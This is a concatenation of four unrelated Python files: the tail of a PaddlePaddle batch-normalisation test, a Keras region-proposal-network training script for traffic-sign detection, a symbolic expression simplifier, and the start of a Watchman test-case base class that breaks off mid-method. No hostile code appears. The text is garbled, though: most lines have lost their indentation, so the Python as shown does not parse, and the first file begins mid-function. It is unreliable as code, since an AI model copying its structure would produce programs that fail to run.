        self.__assert_close(y_out, y_out2_trans, "batch output")
print 'python: NHWC, NCHW, forward checking passed'
# test backward now
# NHWC
self.y_grad = np.random.random_sample(x_shape).astype(np.float32)
y_grad = self.y_grad
# y_grad = np.ones(x_shape).astype(np.float32)
x_grad_ref, scale_grad_ref, bias_grad_ref = _reference_grad(
x_val, y_grad, scale_val, saved_mean, var_ref, epsilon, "NHWC")
# NCHW
y_grad2 = np.transpose(y_grad, (0, 3, 1, 2))
# y_grad2 = np.ones(x_shape2).astype(np.float32)
x_grad_ref2, scale_grad_ref2, bias_grad_ref2 = _reference_grad(
x_val2, y_grad2, scale_val, saved_mean2, var_ref2, epsilon, "NCHW")
self.__assert_close(scale_grad_ref, scale_grad_ref2, "scale gradient")
self.__assert_close(bias_grad_ref, bias_grad_ref2, "bias gradient")
x_grad_transpose = np.transpose(x_grad_ref2, (0, 2, 3, 1))
self.__assert_close(x_grad_ref, x_grad_transpose, "x gradient")
print 'python: NHWC, NCHW, backward checking passed'
def test_forward_backward(self):
        def test_with_place(place, data_format):
# attr
epsilon = 0.00001
momentum = 0.9
            # N, H, W, C: 2, 3, 4, 2
n, h, w, c = 2, 3, 4, 2
if data_format == "NHWC":
x_shape = [n, h, w, c]
elif data_format == "NCHW":
x_shape = [n, c, h, w]
else:
raise ValueError("Unknown data type.")
scale_shape = [c]
x_val = np.random.random_sample(x_shape).astype(np.float32)
scale_val = np.random.random_sample(scale_shape).astype(np.float32)
bias_val = np.random.random_sample(scale_shape).astype(np.float32)
mean = np.zeros(scale_shape).astype(np.float32)
variance = np.ones(scale_shape).astype(np.float32)
# run forward
y_out, saved_mean, var_ref = _reference_training(
x_val, scale_val, bias_val, epsilon, data_format)
# update moving mean and variance
mean_out = saved_mean * (1. - momentum) + momentum * mean
variance_out = var_ref * (1. - momentum) + momentum * variance
saved_variance = 1. / np.sqrt(var_ref + epsilon)
# for gradient test
# y_grad = np.ones(x_shape).astype(np.float32)
y_grad = np.zeros(x_shape).astype(np.float32)
y_grad[0, 0, 0, 0] = 1.
# y_grad = np.random.random_sample(x_shape).astype(np.float32)
x_grad_ref, scale_grad_ref, bias_grad_ref = _reference_grad(
x_val, y_grad, scale_val, saved_mean, var_ref, epsilon,
data_format)
scope = core.Scope()
# create input
x_tensor = create_or_get_tensor(scope, "x_val", x_val, place)
scale_tensor = create_or_get_tensor(scope, "scale_val", scale_val,
place)
bias_tensor = create_or_get_tensor(scope, "bias_val", bias_val,
place)
mean_tensor = create_or_get_tensor(scope, "mean", mean, place)
variance_tensor = create_or_get_tensor(scope, "variance", variance,
place)
# create output
y_tensor = create_or_get_tensor(scope, "y_out", None, place)
saved_mean_tensor = create_or_get_tensor(scope, "saved_mean", None,
place)
saved_variance_tensor = create_or_get_tensor(
scope, "saved_variance", None, place)
mean_out_tensor = mean_tensor
variance_out_tensor = variance_tensor
batch_norm_op = Operator(
"batch_norm",
# inputs
X="x_val",
Scale="scale_val",
Bias="bias_val",
Mean="mean",
Variance="variance",
# outputs
Y="y_out",
MeanOut="mean",
VarianceOut="variance",
SavedMean="saved_mean",
SavedVariance="saved_variance",
# attrs
is_test=False,
                tensor_format=data_format,
momentum=momentum,
epsilon=epsilon)
ctx = core.DeviceContext.create(place)
batch_norm_op.run(scope, ctx)
# check forward result
self.__assert_close(y_tensor, y_out, "y_out")
self.__assert_close(saved_mean_tensor, saved_mean, "saved_mean")
self.__assert_close(saved_variance_tensor, saved_variance,
"saved_variance")
self.__assert_close(mean_out_tensor, mean_out, "mean_out")
if isinstance(place, core.GPUPlace):
atol = 5e-2
else:
atol = 1e-4
self.__assert_close(variance_out_tensor, variance_out,
"variance_out", atol)
print "op test forward passed: ", str(place), tensor_format
# run backward
batch_norm_op_grad = get_backward_op(scope, batch_norm_op, set())
set_output_grad(
scope,
["y_out", "mean", "variance", "saved_mean", "saved_variance"],
place,
feed_dict={"y_out": y_grad})
batch_norm_op_grad.run(scope, ctx)
x_grad_tensor = create_or_get_tensor(scope,
grad_var_name("x_val"), None,
place)
scale_grad_tensor = create_or_get_tensor(scope,
grad_var_name("scale_val"),
None, place)
bias_grad_tensor = create_or_get_tensor(scope,
grad_var_name("bias_val"),
None, place)
# check gradient output
self.__assert_close(x_grad_tensor, x_grad_ref, "x_grad")
self.__assert_close(scale_grad_tensor, scale_grad_ref, "scale_grad")
self.__assert_close(bias_grad_tensor, bias_grad_ref, "bias_grad")
print "op test backward passed: ", str(place), tensor_format
places = [core.CPUPlace()]
if core.is_compile_gpu() and core.op_support_gpu("batch_norm"):
places.append(core.GPUPlace(0))
for place in places:
for data_format in ["NCHW", "NHWC"]:
test_with_place(place, data_format)
if __name__ == '__main__':
unittest.main()
|
|
import keras
from keras.models import Model, Sequential
from keras.layers import Activation, Dropout, Flatten, Dense, Input
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.merge import Concatenate
from keras.callbacks import ProgbarLogger, ModelCheckpoint, TensorBoard, EarlyStopping
from keras.preprocessing.image import ImageDataGenerator
import keras.backend as K
import numpy as np
from skimage.io import imread
################################# BASE LAYERS #################################
def vgg(input_layer, trainable=False):
vgg19 = keras.applications.vgg19.VGG19(include_top=False)
vgg19.trainable = trainable
return vgg19(input_layer)
def base(input_layer):
return Sequential([
Conv2D(filters=32, kernel_size=(3,3), padding="same", activation='relu', input_shape=(800,1360,3)),
MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=(5,5), padding="same", activation='relu'),
MaxPooling2D(pool_size=(2, 2)),
])(input_layer)
################################# RPN LAYERS #################################
def rpn(base, k):
x = Conv2D(256, (3, 3), padding='same', activation='relu',
kernel_initializer=keras.initializers.RandomNormal(0.0, 0.01), name='rpn_conv_1')(base)
return(
Conv2D(k, (1, 1), activation='sigmoid',
kernel_initializer=keras.initializers.RandomNormal(0.0, 0.01), name='rpn_cls')(x),
Conv2D(k*4, (1, 1), activation='linear',
kernel_initializer=keras.initializers.RandomNormal(0.0, 0.01), name='rpn_regr')(x))
################################# BOXES #################################
def get_anchors(rows, cols, sizes, stride):
# Generate 1:1 anchor boxes
# anc_num = len(sizes) [= k in the frcnn paper]
# shape = (rows, cols, anc_num, 4)
return np.expand_dims(np.tile(np.indices((rows,cols)).transpose((1,2,0)) * stride + .5, 2), axis=2).repeat(len(sizes), axis=2) \
+ np.repeat(np.expand_dims(np.array(sizes), axis=1), 4, axis=1) * [-.5, -.5, .5, .5]
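# Example: get_anchors(200, 340, [16, 24, 32], 4).shape == (200, 340, 3, 4);
# the anchor at (row r, col c, size s) is centred at (r*4 + .5, c*4 + .5) and
# spans s/2 on each side, stored as [y1, x1, y2, x2].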
def intersect(b1, b2):
# b1.shape = (rows, cols, anc_num, 4)
# b2.shape = (4,)
m = np.minimum(b1,b2)
M = np.maximum(b1,b2)
h = np.maximum(m[...,2] - M[...,0], 0)
w = np.maximum(m[...,3] - M[...,1], 0)
return w*h
def union(b1, b2, iarea):
# b1.shape = (rows, cols, anc_num, 4)
# b2.shape = (4,)
a1 = (b1[...,2]-b1[...,0]) * (b1[...,3]-b1[...,1])
a2 = (b2[...,2]-b2[...,0]) * (b2[...,3]-b2[...,1])
return a1 + a2 - iarea
def iou(b1, b2):
# b1.shape = (rows, cols, anc_num, 4)
# b2.shape = (4,)
iarea = intersect(b1, b2)
uarea = union(b1, b2, iarea)
return iarea/uarea
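# Worked example: for an anchor [0, 0, 2, 2] and gt box b2 = [1, 1, 3, 3] the
# intersection is the unit square [1, 1, 2, 2] (area 1), the union is
# 4 + 4 - 1 = 7, so iou == 1/7.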
def coords2param(ancs, gtbs):
# Convert absolute coords to parametrized params (see frcnn paper)
# ancs.shape = gtbs.shape = (rows, cols, anc_num, 4)
# box = [y1,x1,y2,x2]
wa = ancs[...,3] - ancs[...,1]
ha = ancs[...,2] - ancs[...,0]
tx = (gtbs[...,1] - ancs[...,1]) / wa
    ty = (gtbs[...,0] - ancs[...,0]) / ha
tw = np.log((gtbs[...,3] - gtbs[...,1]) / wa)
th = np.log((gtbs[...,2] - gtbs[...,0]) / ha)
# shape = (row, cols, anc_num, 4)
return np.stack([tx,ty,tw,th], axis=-1)
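# Worked example: anchor [0, 0, 10, 10] with ground truth [2, 4, 8, 10] gives
# wa = ha = 10, tx = (4 - 0)/10 = 0.4, ty = (2 - 0)/10 = 0.2, and
# tw = th = log(6/10).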
def anchors_vs_gt(ancs, gtbs, lo, hi):
# ancs.shape = (rows, cols, anc_num, 4)
# gtbs.shape = (gtb_num, 4)
# ious.shape = (rows, cols, anc_num, gtb_num)
ious = np.stack([iou(ancs, gtb) for gtb in gtbs], axis=-1)
# best.shape = (gtb_num,)
best = ious.reshape((-1, gtbs.shape[0])).max(axis=0)
# box_pos.shape = box_neg.shape = (rows, cols, anc_num)
box_pos = np.logical_or(ious.max(axis=-1) >= hi, np.logical_and(ious == best, best > 0).any(axis=-1))
box_neg = ious.max(axis=-1) <= lo
# hard_pos = anchor boxes with iou >= 0.7 with any gt box
# soft_pos = anchor boxes with highest iou with a gt box
# hard_neg = anchor boxes with iou <= 0.3 with all gt boxes
## print("\thard_pos = {:d}".format(np.sum(ious.max(axis=-1) >= hi)))
## print("\tsoft_pos = {:d}".format(np.sum(np.logical_and(ious == best, best > 0).any(axis=-1))))
## print("\thard_neg = {:d}".format(np.sum(ious.max(axis=-1) <= lo)))
# best_gt.shape = (rows, cols, anc_num, 4)
best_gt = np.take(gtbs, ious.argmax(axis=-1), axis=0)
return box_pos, box_neg, coords2param(ancs, best_gt)
def filter_boxes(pos, neg, num):
# Only use num boxes, with pos:neg at most 1:1 unless pos < num/2
p_num = pos[pos].shape[0]
n_num = neg[neg].shape[0]
if p_num > num/2:
pos[np.vsplit(np.vstack(np.where(pos))[:,np.random.choice(p_num, p_num-num//2, replace=False)], pos.ndim)] = False
p_num = num//2
if n_num + p_num > num:
neg[np.vsplit(np.vstack(np.where(neg))[:,np.random.choice(n_num, n_num-num+p_num, replace=False)], neg.ndim)] = False
return pos, neg
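# Example: with num=256, 40 positives and 5000 negatives keeps all 40
# positives and samples 216 negatives; 300 positives and 5000 negatives is
# trimmed to 128 of each.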
################################# LOSSES #################################
def rpn_regr_loss(num_ancs):
def loss(ytrue, ypred, ptrue):
# ytrue.shape = (rows, cols, num_ancs * 4)
# ypred.shape = (rows, cols, num_ancs * 4)
# ptrue.shape = (rows, cols, num_ancs * 4)
# ancs.shape = (rows, cols, num_ancs * 4)
dy = ytrue - ypred
sw = K.cast(K.less(K.abs(dy), 1), dtype=K.floatx())
r1 = sw*dy*dy*.5
r2 = (1-sw)*(K.abs(dy)-.5)
return K.sum((r1+r2) * ptrue)
return lambda ytrue, ypred: \
loss(ytrue[...,4*num_ancs:],
ypred,
ytrue[...,:4*num_ancs])
def rpn_cls_loss(num_ancs):
def loss(postrue, negtrue, ppred):
# Add epsilon = 1e-4 to prevent log(0)
return K.sum(- postrue * K.log(1e-4 + ppred)
- negtrue * K.log(1e-4 + 1-ppred))
return lambda ptrue, ppred: loss(ptrue[...,:num_ancs], ptrue[...,num_ancs:], ppred)
################################# DATA #################################
def datagen(start, stop, ancs=None, shuffle=True):
"""Generator for GTSDB dataset
Args:
start, stop = range of images to use
ancs = anchor boxes to use. Use get_anchors() to generate these.
            Dimensions should be (imageheight/basenet_stride, imagewidth/basenet_stride, k, 4)
            Defaults to get_anchors(200, 340, [16,24,32], 4)
shuffle = whether to shuffle the data
"""
if ancs is None:
ancs = get_anchors(200, 340, [16,24,32], 4)
csv = np.loadtxt('../dataset/PNG_train/gt.txt', delimiter=',', converters = {0: lambda x:x[:-4]}, dtype=np.int32)
    idx = np.arange(start, stop)
    # fit_generator expects an endless generator, so loop over the range forever
    while True:
        if shuffle:
            np.random.shuffle(idx)
        for i in idx:
            temp = csv[csv[:,0] == i]
            temp = temp[:,[2,1,4,3]]
            # temp.shape = (gtb_num, 4)
            ## print("fname = ../dataset/PNG_train/{:05d}.png".format(i))
            pos, neg, gtbs = anchors_vs_gt(ancs, temp, .3, .7)
            gtbs = gtbs.reshape((gtbs.shape[0], gtbs.shape[1], -1))
            # pos.shape = neg.shape = (rows, cols, anc_num)
            # gtbs.shape = (rows, cols, anc_num * 4)
            pos, neg = filter_boxes(pos, neg, 256)
            # x_img.shape = (1, imgh, imgw, imgchannels)
            # y_cls.shape = (1, rows, cols, anc_num * 2)
            # y_regr.shape = (1, rows, cols, anc_num * 8)
            x_img = np.expand_dims(imread('../dataset/PNG_train/{:05d}.png'.format(i)), 0)
            y_cls = np.expand_dims(np.concatenate((pos, neg), axis=-1).astype(np.int32), 0)
            y_regr = np.expand_dims(np.concatenate((pos.repeat(4, axis=-1), gtbs), axis=-1), 0)
            yield (x_img, [y_cls, y_regr])
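# Example usage (a sketch; assumes the GTSDB PNGs and gt.txt exist at the
# hardcoded paths above):
#   gen = datagen(0, 10, shuffle=False)
#   x_img, (y_cls, y_regr) = next(gen)
#   # x_img: (1, 800, 1360, 3), y_cls: (1, rows, cols, anc_num*2)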
################################# MODEL #################################
# Find existing model
import os, re
temp = [re.compile(r'gtsdb_rpn-(\d+)\.hdf5').match(fn) for fn in os.listdir('models/gtsdb_rpn/')]
temp = [int(m.group(1)) for m in temp if m is not None]
# Load the model if it exists, otherwise build a new one
if len(temp) == 0:
inp = Input(shape=(800,1360,3))
model = Model(inputs=inp, outputs=rpn(base(inp), 3))
model.compile(optimizer='sgd', loss={'rpn_cls': rpn_cls_loss(3), 'rpn_regr': rpn_regr_loss(3)})
else:
model = keras.models.load_model('models/gtsdb_rpn/gtsdb_rpn-{:d}.hdf5'.format(max(temp)))
################################# TRAIN #################################
model.fit_generator(
datagen(0, 600, shuffle=True),
steps_per_epoch = 600,
epochs = 100,
validation_data = datagen(600, 900),
validation_steps = 300,
verbose = 1,
callbacks = [
ProgbarLogger(count_mode='steps'),
ModelCheckpoint('models/gtsdb_rpn/gtsdb_rpn-{epoch}.hdf5', verbose=1, save_best_only = True),
TensorBoard(log_dir='tblogs/gtsdb_rpn/', write_graph=True, write_grads=True, write_images=True),
EarlyStopping(patience=5, verbose=1),
],)
|
|
from . import stdops as stdops
from . import core
from . import copy
from . import operator
from . import factor
from .core import wild
def reduce(func, iterable, initial=None, reverse=False):
x=initial
if reverse:
iterable=reversed(iterable)
for e in iterable:
x=func(x,e) if x is not None else e
return x
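# e.g. reduce(lambda a, b: a + b, [1, 2, 3]) == 6, while reverse=True folds
# right-to-left: reduce(lambda a, b: a - b, [1, 2, 3], reverse=True) == 0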
#TODO: replace the cmp-style comparators below with key functions
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
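# Example: sorted(exprs, key=cmp_to_key(_order)) sorts a list of expressions
# with the module-internal comparator below, putting Numbers before Symbols
# before compound expressions -- the same trick as functools.cmp_to_key.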
def _order(a,b):
'''
used internally to put stuff in canonical order
'''
if isinstance(a, core.Number):
if(isinstance(b, core.Number)):
return -1 if a.n < b.n else (0 if a.n == b.n else 1)
return -1
elif isinstance(b, core.Number):
return 1
elif isinstance(a, core.Symbol):
if(isinstance(b, core.Symbol)):
return -1 if a.name < b.name else (0 if a.name == b.name else 1)
return -1
elif isinstance(b, core.Symbol):
return 1
else:
return -1 if str(a) < str(b) else (0 if str(a) == str(b) else 1)
def _assoc_reorder(exp):
if len(exp) == 1:
return exp
# canonicalize the arguments first
args = list([_assoc_reorder(x) for x in exp.args])
if tuple(args) != tuple(exp.args):
exp = core.Fn(exp.fn, *args)
# if it's associative and one of the arguments is another instance of the
# same function, canonicalize the order
if len(exp.args) == 2 and 'associative' in exp.kargs and exp.kargs['associative']:
args = exp._get_assoc_arguments()
oldargs = tuple(args)
args.sort(key=cmp_to_key(_order))
if tuple(args) != oldargs:
            exp = reduce(lambda a, b: exp.fn(a, b), args)
return exp
def _remove_subtractions(exp):
a,b = core.wilds('a b')
vals = {}
if exp.match(stdops.Sub(a,b), vals):
return vals['a'] + (-vals['b'])
else:
return exp
def _strip_identities_pass(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(a(b, c)):
kargs = exp[0].kargs
        lidentity = kargs.get('lidentity', kargs.get('identity'))
        ridentity = kargs.get('ridentity', kargs.get('identity'))
        if lidentity is not None and exp.match(a(lidentity, b), vals):
            return vals['b'].walk(_strip_identities)
        elif ridentity is not None and exp.match(a(b, ridentity), vals):
return vals['b'].walk(_strip_identities)
return exp
def _strip_identities(exp):
rv = exp.walk(_strip_identities_pass)
while rv != exp:
exp = rv
rv = exp.walk(_strip_identities_pass)
return rv
def _zero_terms(exp):
    # if the operator has an absorbing ("zero") element and any argument
    # equals it, the whole expression collapses to that element
    if hasattr(exp[0], 'kargs') and 'zero' in exp[0].kargs:
        for i in range(1, len(exp)):
            if exp[i] == exp[0].kargs['zero']:
                return exp[0].kargs['zero']
    return exp
def _distribute(op1, op2):
def _(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(op1(op2(a, b), c), vals):
return op2(op1(vals['c'], vals['a']), op1(vals['c'], vals['b']))
elif exp.match(op1(a, op2(b, c)), vals):
return op2(op1(vals['a'], vals['b']), op1(vals['a'], vals['c']))
else:
return exp
return _
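# Example: _distribute(stdops.Mul, stdops.Add) rewrites one level of
# multiplication over addition, e.g. x * (y + z) -> (x * y) + (x * z);
# _simplify_pass applies it via exp.walk() so nested occurrences are reached.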
def _simplify_mul_div(exp):
a,b,c = core.wilds('a b c')
vals = core.WildResults()
if exp.match(b + (a * b), vals) or exp.match(b + (b * a), vals):
if isinstance(vals.a, core.Number):
return (vals['a'] + 1) * vals['b']
if exp.match(c * (b / c), vals) or exp.match((b / c) * c, vals):
return vals.b
if exp.match(a * (b / c), vals) or exp.match((b / c) * a, vals):
return (vals.a * vals.b) / vals.c
elif exp.match(a / b, vals) and isinstance(vals.b, core.Number):
return vals.a * (1.0 / vals.b.value())
elif exp.match(a / b, vals) and factor.is_factor(vals.b, vals.a):
return factor.get_coefficient(vals.a, vals.b)
if exp.match(((a) / (a ** b)), vals):
if isinstance(vals.b, core.Number):
return (core.symbolic(1) / vals.a ** (vals.b.value()-1))
if exp.match(((a ** b) / (a)), vals):
if isinstance(vals.b, core.Number):
return (vals.a ** (vals.b.value()-1))
    if exp.match(((a ** c) / (a ** b)), vals):
        if isinstance(vals.b, core.Number) and isinstance(vals.c, core.Number):
            if vals.c.value() > vals.b.value():
                return vals.a ** (vals.c.value() - vals.b.value())
            elif vals.c.value() == vals.b.value():
                return core.symbolic(1)
            else:
                return core.symbolic(1) / (vals.a ** (vals.b.value() - vals.c.value()))
    return exp
def _simplify_known_values(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(a(b,c), vals) \
and 'numeric' in vals['a'].kargs \
and isinstance(vals['b'], core._KnownValue) \
and isinstance(vals['c'], core._KnownValue):
cast = vals['a'].kargs['cast'] if 'cast' in vals['a'].kargs else (lambda x: x)
nfn = getattr(operator, vals['a'].kargs['numeric'])
return core.symbolic(nfn(cast(vals['b'].value()), cast(vals['c'].value())))
else:
return exp
def _get_factors(exp):
rv = {}
a,b = core.wilds('a b')
vals = {}
if exp.match(a * b, vals):
tmp = _get_factors(vals['a'])
for i in tmp:
if i in rv:
rv[i] = tmp[i] + rv[i]
else:
rv[i] = tmp[i]
tmp = _get_factors(vals['b'])
for i in tmp:
if i in rv:
rv[i] = tmp[i] + rv[i]
else:
rv[i] = tmp[i]
elif exp.match(a ** b, vals):
rv = _get_factors(vals['a'])
for k in rv:
rv[k] = vals['b'] * rv[k]
else:
rv[exp] = 1
return rv
def _fold_additions(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(a + a, vals):
return vals['a'] * 2
elif exp.match(a + (a * b), vals) or exp.match(a + (b * a), vals):
return (vals['b'] + 1) * vals['a']
elif exp.match(b + (a * b), vals) or exp.match(b + (b * a), vals):
return (vals['a'] + 1) * vals['b']
else:
return exp
def _convert_to_pow(exp):
a,b,c = core.wilds('a b c')
if not exp.match(a(b,c)):
return exp
fs = _get_factors(exp)
rv = 1
for k in fs:
if fs[k] == 1:
rv = k * rv
else:
rv = (k ** fs[k]) * rv
return rv
def _args(exp):
return list([exp[x] for x in range(1, len(exp))])
def _simplify_bitops(exp):
a,b = core.wilds('a b')
vals = core.WildResults()
if exp.match(a ^ a):
return core.symbolic(0)
elif exp.match(a | a, vals):
return vals.a
elif exp.match(a & a, vals):
return vals.a
elif exp.match((a << b) >> b, vals) or exp.match((a >> b) << b, vals):
return vals.a
else:
return exp
def _commutative_reorder(exp):
oexp = exp
if len(exp) > 1 and 'commutative' in exp[0].kargs:
args = list([x.walk(_commutative_reorder) for x in _args(exp)])
args.sort(key=cmp_to_key(_order))
exp = exp[0](*args)
return exp
#TODO: Simplify Trig Identities
def _simplify_pass(exp):
exp = exp.walk(\
_commutative_reorder, \
_strip_identities, \
_simplify_mul_div, \
_strip_identities, \
_simplify_known_values, \
_strip_identities, \
_convert_to_pow, \
_strip_identities, \
_remove_subtractions, \
_strip_identities, \
_distribute(stdops.BitAnd, stdops.BitOr), \
_strip_identities, \
_distribute(stdops.Mul, stdops.Add), \
_strip_identities, \
_fold_additions, \
_strip_identities, \
_zero_terms, \
_strip_identities, \
_commutative_reorder, \
_strip_identities, \
_distribute(stdops.BitAnd, stdops.BitOr), \
_strip_identities, \
_distribute(stdops.Mul, stdops.Add), \
_strip_identities, \
_assoc_reorder, \
_strip_identities, \
_simplify_bitops, \
_strip_identities, \
_simplify_mul_div, \
_strip_identities \
)
return exp.walk(_strip_identities)
def simplify(exp):
'''
attempts to simplify an expression
is knowledgeable of the operations defined in symath.stdops
'''
sexp = _simplify_pass(exp)
while sexp != exp:
        #print('%s => %s' % (exp, sexp))
exp = sexp
sexp = _simplify_pass(exp)
return exp
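# Example usage (a sketch; assumes symath exposes a symbols() constructor):
#   x, y = symath.symbols('x y')
#   simplify(x * (y + y))          # -> an expression equivalent to 2 * x * y
#   simplify((x ** 3) / (x ** 3))  # -> 1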
|
|
# vim:ts=4:sw=4:et:
# Copyright 2012-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
# no unicode literals
from __future__ import absolute_import, division, print_function
import errno
import functools
import inspect
import os
import os.path
import tempfile
import time
import Interrupt
import pywatchman
import TempDir
import WatchmanInstance
from path_utils import norm_absolute_path, norm_relative_path
try:
import unittest2 as unittest
except ImportError:
import unittest
if pywatchman.compat.PYTHON3:
STRING_TYPES = (str, bytes)
else:
STRING_TYPES = (str, unicode) # noqa: F821
if os.name == "nt":
# monkey patch to hopefully minimize test flakiness
def wrap_with_backoff(fn):
def wrapper(*args, **kwargs):
delay = 0.01
attempts = 10
while True:
try:
return fn(*args, **kwargs)
except WindowsError as e:
if attempts == 0:
raise
# WindowsError: [Error 32] The process cannot access the
# file because it is being used by another process.
# Error 5: Access is denied.
if e.winerror not in (5, 32):
raise
attempts = attempts - 1
time.sleep(delay)
delay = delay * 2
return wrapper
for name in ["rename", "unlink", "remove", "rmdir", "makedirs"]:
setattr(os, name, wrap_with_backoff(getattr(os, name)))
if not pywatchman.compat.PYTHON3:
unittest.TestCase.assertCountEqual = unittest.TestCase.assertItemsEqual
unittest.TestCase.assertRegex = unittest.TestCase.assertRegexpMatches
unittest.TestCase.assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
class TempDirPerTestMixin(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TempDirPerTestMixin, self).__init__(*args, **kwargs)
self.tempdir = None
def setUp(self):
super(TempDirPerTestMixin, self).setUp()
id = self._getTempDirName()
# Arrange for any temporary stuff we create to go under
# our global tempdir and put it in a dir named for the test
self.tempdir = os.path.join(TempDir.get_temp_dir().get_dir(), id)
os.mkdir(self.tempdir)
def _getTempDirName(self):
return self.id()
def mkdtemp(self, **kwargs):
return norm_absolute_path(tempfile.mkdtemp(dir=self.tempdir, **kwargs))
def mktemp(self, prefix=""):
f, name = tempfile.mkstemp(prefix=prefix, dir=self.tempdir)
os.close(f)
return name
class WatchmanTestCase(TempDirPerTestMixin, unittest.TestCase):
def __init__(self, methodName="run"):
super(WatchmanTestCase, self).__init__(methodName)
self.setDefaultConfiguration()
self.maxDiff = None
self.attempt = 0
# ASAN-enabled builds can be slower enough that we hit timeouts
# with the default of 1 second
self.socketTimeout = 10.0
def requiresPersistentSession(self):
return False
def checkPersistentSession(self):
if self.requiresPersistentSession() and self.transport == "cli":
self.skipTest("need persistent session")
def checkOSApplicability(self):
# override this to call self.skipTest if this test class should skip
# on the current OS
pass
def skipIfCapabilityMissing(self, cap, reason):
res = self.getClient().capabilityCheck([cap])
if not res["capabilities"][cap]:
self.skipTest(reason)
def setUp(self):
super(WatchmanTestCase, self).setUp()
self.checkPersistentSession()
self.checkOSApplicability()
def getClient(self, inst=None, replace_cached=False, no_cache=False):
if inst or not hasattr(self, "client") or no_cache:
client = pywatchman.client(
timeout=self.socketTimeout,
transport=self.transport,
sendEncoding=self.encoding,
recvEncoding=self.encoding,
sockpath=(inst or WatchmanInstance.getSharedInstance()).getSockPath(),
)
if (not inst or replace_cached) and not no_cache:
# only cache the client if it points to the shared instance
self.client = client
self.addCleanup(lambda: self.__clearClient())
return client
return self.client
def __logTestInfo(self, test, msg):
if hasattr(self, "client"):
try:
self.getClient().query("log", "debug", "TEST: %s %s\n\n" % (test, msg))
except Exception:
pass
def setAttemptNumber(self, attempt):
self.attempt = attempt
def __clearClient(self):
if hasattr(self, "client"):
self.client.close()
delattr(self, "client")
def _getTempDirName(self):
name = self._getLongTestID()
if self.attempt > 0:
name += "-%d" % self.attempt
return name
def _getLongTestID(self):
return "%s.%s.%s" % (self.id(), self.transport, self.encoding)
def run(self, result):
if result is None:
raise Exception("MUST be a runtests.py:Result instance")
id = self._getLongTestID()
try:
self.__logTestInfo(id, "BEGIN")
super(WatchmanTestCase, self).run(result)
finally:
try:
self.watchmanCommand("log-level", "off")
self.getClient().getLog(remove=True)
except Exception:
pass
self.__logTestInfo(id, "END")
self.__clearWatches()
self.__clearClient()
return result
def dumpLogs(self):
""" used in travis CI to show the hopefully relevant log snippets """
print(self.getLogSample())
def getLogSample(self):
""" used in CI to show the hopefully relevant log snippets """
inst = WatchmanInstance.getSharedInstance()
def tail(logstr, n):
lines = logstr.split("\n")[-n:]
return "\n".join(lines)
return "\n".join(
[
"CLI logs",
tail(inst.getCLILogContents(), 500),
"Server logs",
tail(inst.getServerLogContents(), 500),
]
)
def getServerLogContents(self):
"""
Returns the contents of the server log file as an array
that has already been split by line.
"""
return WatchmanInstance.getSharedInstance().getServerLogContents().split("\n")
def setConfiguration(self, transport, encoding):
self.transport = transport
self.encoding = encoding
def removeRelative(self, base, *fname):
fname = os.path.join(base, *fname)
os.remove(fname)
def touch(self, fname, times=None):
try:
os.utime(fname, times)
except OSError as e:
if e.errno == errno.ENOENT:
with open(fname, "a"):
os.utime(fname, times)
else:
raise
def touchRelative(self, base, *fname):
fname = os.path.join(base, *fname)
self.touch(fname, None)
def __clearWatches(self):
if hasattr(self, "client"):
try:
self.client.subs = {}
self.client.sub_by_root = {}
self.watchmanCommand("watch-del-all")
except Exception:
pass
def __del__(self):
self.__clearWatches()
def watchmanCommand(self, *args):
return self.getClient().query(*args)
def _waitForCheck(self, cond, res_check, timeout):
deadline = time.time() + timeout
res = None
while time.time() < deadline:
Interrupt.checkInterrupt()
res = cond()
if res_check(res):
return [True, res]
time.sleep(0.03)
return [False, res]
    # Continually invoke `cond` until it returns true or the timeout
    # is reached. Returns a [success, result] list where the first
    # element indicates success/failure and the second element is the
    # return value from the last invocation of the condition.
def waitFor(self, cond, timeout=10):
return self._waitForCheck(cond, lambda res: res, timeout)
def waitForEqual(self, expected, actual_cond, timeout=10):
return self._waitForCheck(actual_cond, lambda res: res == expected, timeout)
def assertWaitFor(self, cond, timeout=10, message=None):
status, res = self.waitFor(cond, timeout)
if status:
return res
if message is None:
message = "%s was not met in %s seconds: %s" % (cond, timeout, res)
self.fail(message)
def assertWaitForEqual(self, expected, actual_cond, timeout=10, message=None):
status, res = self.waitForEqual(expected, actual_cond, timeout)
if status:
return res
if message is None:
message = "%s was not equal to %s in %s seconds: %s" % (
actual_cond,
expected,
timeout,
res,
)
self.fail(message)
def getFileList(self, root, cursor=None, relativeRoot=None):
expr = {"expression": ["exists"], "fields": ["name"]}
if cursor:
expr["since"] = cursor
if relativeRoot:
expr["relative_root"] = relativeRoot
res = self.watchmanCommand("query", root, expr)
files = res["files"]
self.last_file_list = files
return files
def waitForSync(self, root):
""" ensure that watchman has observed any pending file changes
This is most useful after mutating the filesystem and before
attempting to perform a since query
"""
self.watchmanCommand(
"query", root, {"expression": ["name", "_bogus_"], "fields": ["name"]}
)
def getWatchList(self):
watch_list = self.watchmanCommand("watch-list")["roots"]
self.last_root_list = watch_list
return watch_list
def assertFileListsEqual(self, list1, list2, message=None):
list1 = [norm_relative_path(f) for f in list1]
list2 = [norm_relative_path(f) for f in list2]
self.assertCountEqual(list1, list2, message)
def fileListsEqual(self, list1, list2):
list1 = [norm_relative_path(f) for f in list1]
list2 = [norm_relative_path(f) for f in list2]
return sorted(list1) == sorted(list2)
def fileListContains(self, list1, list2):
""" return true if list1 contains each unique element in list2 """
set1 = set([norm_relative_path(f) for f in list1])
list2 = [norm_relative_path(f) for f in list2]
return set1.issuperset(list2)
def assertFileListContains(self, list1, list2, message=None):
